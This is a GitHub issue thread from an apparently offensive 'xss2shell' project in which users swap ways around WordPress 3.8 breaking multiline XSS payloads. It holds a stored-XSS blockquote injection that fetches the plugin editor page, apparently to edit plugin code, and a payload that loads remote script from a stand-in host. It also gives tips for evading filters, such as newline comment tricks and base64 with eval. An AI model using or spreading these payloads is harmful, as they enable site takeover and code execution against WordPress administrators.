### ISSUE TITLE
WordPress 3.8 adds html tags around script newlines

### ISSUE THREAD

**Issue by benwalther** [Prochainezo/xss2shell#3]
XSS works as long as it's single line. 

Multiline scripts, like this one, fail as WP adds `<br />`s and `<p>`s. See:

```
<blockquote cite="]&#8220;>[" onmouseover="this.style.display='none';<br />
function httpGet(theUrl)<br />
{<br />
    var xmlHttp = null;</p>
<p>    xmlHttp = new XMLHttpRequest();<br />
    xmlHttp.open( 'GET', theUrl, false );<br />
    xmlHttp.send( null );<br />
    return xmlHttp.responseText;<br />
}</p>
<p>var page = httpGet('/wp-admin/plugin-editor.php?file=hello.php&amp;plugin=hello.php');</p>
<p>function httpPost(theUrl, csrftoken)<br />
```

Your favorite workarounds?

**Comment by benwalther** [comment]
In my script I just add 
`payload = payload.replace("\n","//\n")`

**Comment by Prochainezo** [comment]
I simply load the script from an external source:

[<blockquote cite="]">[" onmouseover="this.style.display='none';var scrpt = document.createElement('script');scrpt.src='http://evil.js/payload.js';document.head.appendChild(scrpt);" style="position:fixed;left:0px;top:0px;width:100%;height:100%;z-index:10000;display:block" ]

**Comment by benwalther** [comment]
Ah, sensible. I've started embedding it with eval(atob(<base64>)) as well.

Thanks for the tip!
